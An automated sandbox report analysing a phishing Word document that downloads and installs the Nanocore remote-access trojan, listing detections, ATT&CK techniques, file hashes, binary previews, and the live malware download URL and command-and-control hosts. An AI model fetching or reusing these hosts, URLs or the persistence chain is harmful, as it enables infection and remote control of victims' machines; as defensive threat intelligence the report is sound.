stem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004D29EA bind,		8_2_004D29EA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004D2998 bind,		8_2_004D2998

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Scheduled Task/Job1	Access Token Manipulation1	Disable or Modify Tools11	Input Capture11	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Process Injection312	Obfuscated Files or Information2	LSASS Memory	System Information Discovery14	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Scheduled Task/Job1	Software Packing13	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Masquerading2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion31	LSA Secrets	Virtualization/Sandbox Evasion31	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol222	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection312	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO-14092021.doc	28%	Virustotal		Browse
PO-14092021.doc	20%	ReversingLabs	Document-RTF.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\plugmangd5693.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe	100%	Joe Sandbox ML
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Metadefender		Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\plugmangd5693.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File
8.2.RegSvcs.exe.760000.2.unpack	100%	Avira	TR/NanoCore.fadte		Download File

Domains

Source	Detection	Scanner	Label	Link
lg-tv.tk	15%	Virustotal		Browse
blackbladeinc52.ddns.net	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://lg-tv.tk/plugmanzx.exe	100%	Avira URL Cloud	malware
blackbladeinc52.ddns.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
Backup Connection Host	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lg-tv.tk	185.239.243.112	true	true	15%, Virustotal, Browse	unknown
blackbladeinc52.ddns.net	31.210.20.61	true	true	10%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lg-tv.tk/plugmanzx.exe	true	Avira URL Cloud: malware	unknown
blackbladeinc52.ddns.net	true	Avira URL Cloud: safe	unknown
Backup Connection Host	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmp, RegSvcs.exe, 00000008.00000002.673567560.0000000005800000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671441665.0000000001AF0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.239.243.112	lg-tv.tk	Moldova Republic of		55933	CLOUDIE-AS-APCloudieLimitedHK	true
31.210.20.61	blackbladeinc52.ddns.net	Netherlands		61157	PLUSSERVER-ASN1DE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483042
Start date:	14.09.2021
Start time:	13:15:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO-14092021.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@20/15@7/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 0.8% (good quality ratio 0.7%) Quality average: 62.2% Quality standard deviation: 33.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 499 Number of non-executed functions: 26
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:16:17	API Interceptor	29x Sleep call for process: EQNEDT32.EXE modified
13:16:19	API Interceptor	127x Sleep call for process: plugmangd5693.exe modified
13:16:26	API Interceptor	4x Sleep call for process: schtasks.exe modified
13:16:28	API Interceptor	1290x Sleep call for process: RegSvcs.exe modified
13:16:29	Task Scheduler	Run new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" s>$(Arg0)
13:16:29	API Interceptor	191x Sleep call for process: taskeng.exe modified
13:16:31	Task Scheduler	Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
13:16:31	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.239.243.112	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	lg-tv.tk/whesilozx.exe
	STATEMENT OF ACCOUNT.doc	Get hash	malicious	Browse	lg-tv.tk/bankzx.exe
	famz13 3.doc	Get hash	malicious	Browse	fantecheo.tk/famzlogszx.exe
	8765998RQF.doc	Get hash	malicious	Browse	fantecheo.tk/wealthzx.exe
	PHOTP.doc	Get hash	malicious	Browse	lg-tv.tk/bluezx.exe
	Quotation Required PO3652.doc	Get hash	malicious	Browse	fantecheo.tk/yarozx.exe
	Shipment Document BL,INV and packing list.doc	Get hash	malicious	Browse	fantecheo.tk/bluestwozx.exe
	PO-14092021.doc	Get hash	malicious	Browse	lg-tv.tk/plugmanzx.exe
	DHL-AWD6909800855.doc	Get hash	malicious	Browse	fantecheo.tk/obizx.exe
	purchase invoice.exe	Get hash	malicious	Browse	drossmnfg.com/rult/index.php
	402021.doc	Get hash	malicious	Browse	fantecheo.tk/kdotzx.exe
	INQUIRYORDER.doc	Get hash	malicious	Browse	lg-tv.tk/mazx.exe
	LJUNGBY QUOTATION.doc	Get hash	malicious	Browse	lg-tv.tk/globalzx.exe
	DHL-AWD6909800855.doc	Get hash	malicious	Browse	fantecheo.tk/obizx.exe
	TPL020321.doc	Get hash	malicious	Browse	lg-tv.tk/globalzx.exe
	Purchase Order.doc	Get hash	malicious	Browse	lg-tv.tk/governorzx.exe
	quotation 2021-004.doc	Get hash	malicious	Browse	lg-tv.tk/bluezx.exe
	famz12 4.doc	Get hash	malicious	Browse	fantecheo.tk/famzlogszx.exe
	KOC.doc	Get hash	malicious	Browse	fantecheo.tk/ibefrankzx.exe
	UPDATED STATEMENT OF ACCOUNT.doc	Get hash	malicious	Browse	lg-tv.tk/bankzx.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
lg-tv.tk	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	185.239.243.112
	STATEMENT OF ACCOUNT.doc	Get hash	malicious	Browse	185.239.243.112
	PHOTP.doc	Get hash	malicious	Browse	185.239.243.112
	PO-14092021.doc	Get hash	malicious	Browse	185.239.243.112
	INQUIRYORDER.doc	Get hash	malicious	Browse	185.239.243.112
	LJUNGBY QUOTATION.doc	Get hash	malicious	Browse	185.239.243.112
	TPL020321.doc	Get hash	malicious	Browse	185.239.243.112
	Purchase Order.doc	Get hash	malicious	Browse	185.239.243.112
	quotation 2021-004.doc	Get hash	malicious	Browse	185.239.243.112
	UPDATED STATEMENT OF ACCOUNT.doc	Get hash	malicious	Browse	185.239.243.112
	sapa list.doc	Get hash	malicious	Browse	185.239.243.112
	P.O100%uFFFDpayment.doc__.rtf	Get hash	malicious	Browse	185.239.243.112
	Sinovac Catalogs and Price lists.doc	Get hash	malicious	Browse	185.239.243.112
	WHO.doc	Get hash	malicious	Browse	185.239.243.112
	REQUEST_PURCHASE_INQUIRY.doc	Get hash	malicious	Browse	185.239.243.112
	Quotation Sample Designs.doc	Get hash	malicious	Browse	185.239.243.112
	Order.doc	Get hash	malicious	Browse	185.239.243.112
	LIST_910411.doc	Get hash	malicious	Browse	185.239.243.112
	ORDER.doc	Get hash	malicious	Browse	185.239.243.112
	Remittance copy.doc	Get hash	malicious	Browse	185.239.243.112

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	PO-14092021.doc	Get hash	malicious	Browse	31.210.20.61
	HALKBANK01.exe	Get hash	malicious	Browse	31.210.20.16
	Purchase Order-PU0955387.exe	Get hash	malicious	Browse	31.210.20.4
	P2021-09-13 CIW01130192.exe	Get hash	malicious	Browse	31.210.20.22
	# 310573418 nuevo orden.exe	Get hash	malicious	Browse	31.210.20.16
	Rally RadiatorsREQUEST.pdf.exe	Get hash	malicious	Browse	31.210.20.16
	ddc0dNOK0y.exe	Get hash	malicious	Browse	31.210.20.22
	PO 1210.exe	Get hash	malicious	Browse	31.210.20.16
	XnLs7VLx1v	Get hash	malicious	Browse	91.250.109.135
	bin.exe	Get hash	malicious	Browse	31.210.20.16
	20210909161956_00023,pdf.exe	Get hash	malicious	Browse	31.210.20.16
	PO 12501.exe	Get hash	malicious	Browse	31.210.20.16
	X4lLneI8ZK.exe	Get hash	malicious	Browse	31.210.20.16
	RFQ_PARTS PRICELIST 110-10007046,pdf.exe	Get hash	malicious	Browse	31.210.20.16
	RFQ_PARTS PRICELIST 110-10007046,pdf.exe	Get hash	malicious	Browse	31.210.20.16
	ROHmSaAAiG	Get hash	malicious	Browse	62.138.80.204
	Bxs1wBHcNS.exe	Get hash	malicious	Browse	31.210.20.251
	raoSkUREqo.exe	Get hash	malicious	Browse	31.210.20.251
	jNqtcYPpUY.exe	Get hash	malicious	Browse	31.210.20.251
	6WNWU8oUzk.exe	Get hash	malicious	Browse	31.210.20.251
CLOUDIE-AS-APCloudieLimitedHK	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	185.239.243.112
	STATEMENT OF ACCOUNT.doc	Get hash	malicious	Browse	185.239.243.112
	famz13 3.doc	Get hash	malicious	Browse	185.239.243.112
	8765998RQF.doc	Get hash	malicious	Browse	185.239.243.112
	PHOTP.doc	Get hash	malicious	Browse	185.239.243.112
	Quotation Required PO3652.doc	Get hash	malicious	Browse	185.239.243.112
	Shipment Document BL,INV and packing list.doc	Get hash	malicious	Browse	185.239.243.112
	PO-14092021.doc	Get hash	malicious	Browse	185.239.243.112
	DHL-AWD6909800855.doc	Get hash	malicious	Browse	185.239.243.112
	purchase invoice.exe	Get hash	malicious	Browse	185.239.243.112
	402021.doc	Get hash	malicious	Browse	185.239.243.112
	INQUIRYORDER.doc	Get hash	malicious	Browse	185.239.243.112
	LJUNGBY QUOTATION.doc	Get hash	malicious	Browse	185.239.243.112
	DHL-AWD6909800855.doc	Get hash	malicious	Browse	185.239.243.112
	TPL020321.doc	Get hash	malicious	Browse	185.239.243.112
	Purchase Order.doc	Get hash	malicious	Browse	185.239.243.112
	quotation 2021-004.doc	Get hash	malicious	Browse	185.239.243.112
	famz12 4.doc	Get hash	malicious	Browse	185.239.243.112
	KOC.doc	Get hash	malicious	Browse	185.239.243.112
	UPDATED STATEMENT OF ACCOUNT.doc	Get hash	malicious	Browse	185.239.243.112

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	PO-14092021.doc	Get hash	malicious	Browse
	FACTURA PROFORMA- PO1122002092021.doc	Get hash	malicious	Browse
	Expo Grup - 1122002092021 Sept.doc	Get hash	malicious	Browse
	SWIFT COPY.doc	Get hash	malicious	Browse
	P-C3787633.doc	Get hash	malicious	Browse
	Account Statement.doc	Get hash	malicious	Browse
	NEW Order-05271.doc	Get hash	malicious	Browse
	NEW ORDER.doc	Get hash	malicious	Browse
	Nanocore.New order 22.xlsx	Get hash	malicious	Browse
	PO83783877.xlsx	Get hash	malicious	Browse
	DOC.1000000567.267805032019.doc__.rtf	Get hash	malicious	Browse
	DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc	Get hash	malicious	Browse
	SWIFT COPY.doc	Get hash	malicious	Browse
	PROFORMA INVOICE.doc	Get hash	malicious	Browse
	YD74eyfRAD.exe	Get hash	malicious	Browse
	PR0078966.xlsx	Get hash	malicious	Browse
	SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	Get hash	malicious	Browse
	69JCWICJ9872001.exe	Get hash	malicious	Browse
	Proforma 0089 05 2019.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.7499114035101173
Encrypted:	false
SSDEEP:	384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
MD5:	72A9F09010A89860456C6474E2E6D25C
SHA1:	E4CB506146F60D01EA9E6132020DEF61974A88C3
SHA-256:	7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
SHA-512:	BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PO-14092021.doc, Detection: malicious, Browse Filename: FACTURA PROFORMA- PO1122002092021.doc, Detection: malicious, Browse Filename: Expo Grup - 1122002092021 Sept.doc, Detection: malicious, Browse Filename: SWIFT COPY.doc, Detection: malicious, Browse Filename: P-C3787633.doc, Detection: malicious, Browse Filename: Account Statement.doc, Detection: malicious, Browse Filename: NEW Order-05271.doc, Detection: malicious, Browse Filename: NEW ORDER.doc, Detection: malicious, Browse Filename: Nanocore.New order 22.xlsx, Detection: malicious, Browse Filename: PO83783877.xlsx, Detection: malicious, Browse Filename: DOC.1000000567.267805032019.doc__.rtf, Detection: malicious, Browse Filename: DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc, Detection: malicious, Browse Filename: SWIFT COPY.doc, Detection: malicious, Browse Filename: PROFORMA INVOICE.doc, Detection: malicious, Browse Filename: YD74eyfRAD.exe, Detection: malicious, Browse Filename: PR0078966.xlsx, Detection: malicious, Browse Filename: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx, Detection: malicious, Browse Filename: 69JCWICJ9872001.exe, Detection: malicious, Browse Filename: Proforma 0089 05 2019.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	530432
Entropy (8bit):	7.499649303212309
Encrypted:	false
SSDEEP:	12288:6B6k4DbF53e0IUFLtFlQqUpYpfiTzpFZ2z8WBTNMk4bUtvV:6BExiGaaNBTylO
MD5:	19665F929613C0E945FF13DD25C9362E
SHA1:	7C68CDD329F0AF85782A4B567F9FA37928F942E8
SHA-256:	D21ECA1AE974EF45B254C64420A069072CE32FCE6C191B526D9E81ECFA4537FF
SHA-512:	A364FEC326897ACC19409F3D8BFF688825B25718533B126D656B4EE9559B73D8DA82BDEC405A4B5321ADFC0A51E2A72BCD961D8CD39BB7AF5F67B362EE0D95E7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
IE Cache URL:	http://lg-tv.tk/plugmanzx.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.?a..............0.............b-... ...@....@.. ....................................@..................................-..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D-......H........d..........2...HH...............................................0..P........(...........s....}......++...+...{......s....(.......X........-....X........-..0............{.....+..&...}.......0..............0...2....0.....+....,......r...p..(.......(......(....o.........,......r?..p..(......+D...o.....+...(.......(......(.....o........(....-...........o.............d.+........0.."........~3........9.......~4.....o.......+.....+......X............-....X..........-..-

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{33484DAD-E27E-45D9-8C45-49A85BDC4F7E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EE6AB4D1-7B2E-4321-A676-4477150FF17C}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	3.609723492008749
Encrypted:	false
SSDEEP:	384:0sAZI6on9948WksiTS+LIQ+220Mahajb807UZ:VAa9948WniTXW0MCa0jZ
MD5:	9178D85C40A7B56228F6D04638B09D16
SHA1:	E746A3E982A89040ACDEF54E1066A8D49D8CF671
SHA-256:	9713332DF9727B4BB0E67515CAB31910B619BCA3A627B8643BD5E0E7734BA1CA
SHA-512:	EEF8FCF442719BF0F8D009522B8374692CB35DBEF952B464F124E4D4098F3EF377AEE930FFB18EEF817869A7D4F81F7AF36DB03B7638FAB097053D750D990B24
Malicious:	false
Preview:	%.].9.?.@.>.^.5.?./.@.?.).[.[.`....!.:.,./.5.?.8...4.;.#.(...\|./.0.?.?...0...2..2.1.%.?.=.[.6.5.!.^..-.^.+.1.@.4.)...%.[.4.8._.3.+.:.6.?.`.\|.].2.!.3.?.?...?.).-.'.7.#.@.@.>.9.?.`.?.?.:...<.(.../.1./.%._.?.....@._.0.?.\|.%.$.`.%...2...].+.\|.^.+.%.%.%.0..;.9.$.?.~.3.<.4.:...`.~.^.?.>.;.?.8.~.?.1./.!.;...?.0.).(.).#.,.\|.?.1.5.?.8.].$.0.'.+.#.~...%.:.5._...\|.\|...~..>...`././.?.$.&.#.:.&.0.0.'.5.`.&.).].+.6...?.?.`.9...>.?.@.6.1.,...1.6.^._.-.%.]._.,.&.$.@.`.^.%.9.;.5.....,.6.@.(.?...?.4.7.\|.:...%.=.>._.4.[._.9.:.:.\|.#.+.^.].'.).+.+.&.7...?.`.5.=...0...[.0...@.5._.?.&.7.?.2...%.;.].7.^./.#.!.<.7.!.?.+.?._...^.^.%.;.%.$.?.1.?.0.$.@.3.4.?.%./.../.<.9.3.6.;..^.?.(.=.?......(.&.'.7.#.?.?.../.7.`.]...?.&.$.^.4.?.\|.<.#...7.~.5...;.~.8.3.%.-.9.?.%.7.6.?.&.(.~.).&.?.].%.8.%.!.6.`..`...?.2.%.@.3.\|.1.9.[.(.7.@...%.%.~.).$.-.+.4.+.`.5.=...%.~.-.8.,.?.^.).&.%.(.).^.-...%.?.(.'.$.6.]...=.-.?.6.?.@.&.3.9.5.8.?.%.~.[.&.<.(.7.(.?...5.$.`.=.)...\|.#.'.%.\|.?.7.7.\|...*.6.9.?._.-.'.]...'.;.6...?.^.2.).&.

C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.1063907901076036
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
MD5:	CFAE5A3B7D8AA9653FE2512578A0D23A
SHA1:	A91A2F8DAEF114F89038925ADA6784646A0A5B12
SHA-256:	2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
SHA-512:	9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp3709.tmp Download File
Process:	C:\Users\user\AppData\Roaming\plugmangd5693.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1623
Entropy (8bit):	5.155064161946397
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBLAtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3o
MD5:	F743C4C274FB1D49FD51F49B98EE0190
SHA1:	0C2FCC68B3ECBD1C981F8ACD3A45616400701D21
SHA-256:	8CF9313170C2C7DAA529A3EA1A985A1A387D53B9389B53D2068B2CD702D414FD
SHA-512:	706B60832231DF304ACC4B79A7F9897913200A385A86461A97EF222C5AD027286E1FDD2F04049451882668A468079EA2B30CB252056F65E5B634E31E67D8AC85
Malicious:	true
